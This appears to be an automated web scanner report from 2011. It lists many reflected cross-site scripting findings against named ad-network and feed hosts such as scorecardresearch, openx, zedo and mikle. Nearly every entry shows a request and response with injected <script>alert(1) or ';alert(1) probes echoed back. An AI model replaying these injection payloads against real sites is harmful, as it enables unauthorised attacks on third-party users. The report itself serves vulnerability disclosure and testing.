HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:40:57 GMT Date: Sun, 04 Sep 2011 02:40:57 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"8197ba<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:12 GMT Date: Sun, 04 Sep 2011 02:41:12 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... e;for(b=a.length-1;b>=0;b COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"d00a9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:14 GMT Date: Sun, 04 Sep 2011 02:41:14 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... a.length-1;b>=0;b--){f COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"28839<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:00 GMT Date: Sun, 04 Sep 2011 02:41:00 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"686432261a67<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:03 GMT Date: Sun, 04 Sep 2011 02:41:03 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... ry{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6864322", c3:"c09f3<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:05 GMT Date: Sun, 04 Sep 2011 02:41:05 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"582f7<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:07 GMT Date: Sun, 04 Sep 2011 02:41:07 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... b;a=a||_comscore;for(b=a COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"d9b47<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 02:41:09 GMT Date: Sun, 04 Sep 2011 02:41:09 GMT Content-Length: 1234 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... _comscore;for(b=a.length COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"e0d71<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://bid.openx.net |
Path: | /json |
GET /json?c=OXM_41207221382988b0<script>alert(1)< Host: bid.openx.net Proxy-Connection: keep-alive Referer: http://d.tradex.openx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: i=d2a43928-76cd-49ea-b899 |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Cache-Control: no-cache, must-revalidate P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Set-Cookie: p=1315106851; version=1; path=/; domain=.openx.net; max-age=63072000; OXM_41207221382988b0<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://cps.regis.edu |
Path: | /lp/computer_degree/it |
GET /lp/computer_degree/it Host: cps.regis.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:13:21 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Cache-Control: max-age=1, private, must-revalidate Connection: close Content-Type: text/html Content-Length: 13905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <form id="lp3" action=" /lp/computer_degree/it method="post"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d2/jsc/fm.js |
GET /bar/v16-504/d2/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:aa378$767:66f93 Set-Cookie: FFcat=826,471,14:767,4,14 Set-Cookie: FFad=39:57:31:31:31:None ETag: "182787-8952-4aa4dd2 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=170 Expires: Sun, 04 Sep 2011 02:36:55 GMT Date: Sun, 04 Sep 2011 02:34:05 GMT Content-Length: 5199 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat=',66f93";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,66f93";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var hashval = location.hash; var pubdomain = hashv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d2/jsc/fm.js |
GET /bar/v16-504/d2/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:aa378$767:86fb0 Set-Cookie: FFcat=826,471,14:767,4,14 Set-Cookie: FFad=41:59:31:31:31:None ETag: "182787-8952-4aa4dd2 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=170 Expires: Sun, 04 Sep 2011 02:36:56 GMT Date: Sun, 04 Sep 2011 02:34:06 GMT Content-Length: 5199 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat=',86fb0';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,86fb0';alert(1) if(zzuid=='unknown')zzuid var zzhasA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d2/jsc/fm.js |
GET /bar/v16-504/d2/jsc/fm.js Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 958 Content-Type: application/x-javascript Set-Cookie: FFad=69:28:0:0:0:0:0:47:1 Set-Cookie: FFcat=0,0,0:767,4,94:826 ETag: "182787-8952-4aa4dd2 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=221 Expires: Sun, 04 Sep 2011 04:18:20 GMT Date: Sun, 04 Sep 2011 04:14:39 GMT Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); y10.src='http://r1.zedo var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d2/jsc/fm.js |
GET /bar/v16-504/d2/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=11:29:31:31:31:None Set-Cookie: FFcat=826,471,14:767,4,14 ETag: "182787-8952-4aa4dd2 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=172 Expires: Sun, 04 Sep 2011 02:36:55 GMT Date: Sun, 04 Sep 2011 02:34:03 GMT Content-Length: 5196 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='23241";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=23241";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var hashval = location.hash; var pubdomain = hashv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d2/jsc/fm.js |
GET /bar/v16-504/d2/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=13:31:31:31:31:None Set-Cookie: FFcat=826,471,14:767,4,14 ETag: "182787-8952-4aa4dd2 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=171 Expires: Sun, 04 Sep 2011 02:36:55 GMT Date: Sun, 04 Sep 2011 02:34:04 GMT Content-Length: 5196 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='a4142';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=a4142';alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:cb964';alert(1) Set-Cookie: FFcat=1185,589,14:1185 Set-Cookie: FFad=6:31:31:None;expires ETag: "4368e0d-8952-4aa4df Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=145 Expires: Sun, 04 Sep 2011 02:34:39 GMT Date: Sun, 04 Sep 2011 02:32:14 GMT Content-Length: 4591 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=76;var zzPat='cb964';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=cb964';alert(1)/ if(zzuid=='unknown')zzuid ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:dd578"-alert(1) Set-Cookie: FFcat=1185,589,14:1185 Set-Cookie: FFad=4:31:31:None;expires ETag: "4368e0d-8952-4aa4df Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=145 Expires: Sun, 04 Sep 2011 02:34:38 GMT Date: Sun, 04 Sep 2011 02:32:13 GMT Content-Length: 4657 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=76;var zzPat='dd578"-alert(1)- if(typeof zzStr=='undefined'){ var zzStr="q=dd578"-alert(1)- if(zzuid=='unknown')zzuid var zzhasAd=undefined; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 958 Content-Type: application/x-javascript Set-Cookie: FFad=16:28:0:0:0:0:0:47:1 Set-Cookie: FFcat=0,0,0:767,4,94:826 ETag: "4368e0d-8952-4aa4df P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=222 Expires: Sun, 04 Sep 2011 04:18:20 GMT Date: Sun, 04 Sep 2011 04:14:38 GMT Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); y10.src='http://r1.zedo var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-504/d8/jsc/fm.js |
GET /bar/v16-504/d8/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.dnaindia.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1185:5da07'-alert(1) Set-Cookie: FFcat=1185,589,14:1185 Set-Cookie: FFad=78:31:31:None ETag: "4368e0d-8952-4aa4df Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=147 Expires: Sun, 04 Sep 2011 02:34:38 GMT Date: Sun, 04 Sep 2011 02:32:11 GMT Content-Length: 4697 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=76;var zzPat='b7f5c';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=b7f5c';alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:26 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12145 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <link rel='stylesheet' type='text/css' href='b5e2d'><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:23 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <style type='text/css'> body{margin:0;padding:0;} #container{overflow #header{margin:0px #header .feed_title{margin:0; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:19 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <style type='text/css'> body{margin:0;padding:0;} #container{overflow #header{margin:0px #header .feed_ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:18 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <style type='text/css'> body{margin:0;padding:0;} #container{overflow #header{margin:0px # ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13798 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... or:#FFFFFF;text #header .feed_title a:active{color:#FFFFFF #content{margin:0px #content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;} #content .feed_item_title{margin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13746 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <PARAM NAME="BGCOLOR" VALUE="#FFFFFF5ccbf';alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13716 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... derline;} #header .feed_title a:active{color:#FFFFFF #content{margin:0px #content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;} #content .feed_item_title{margin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
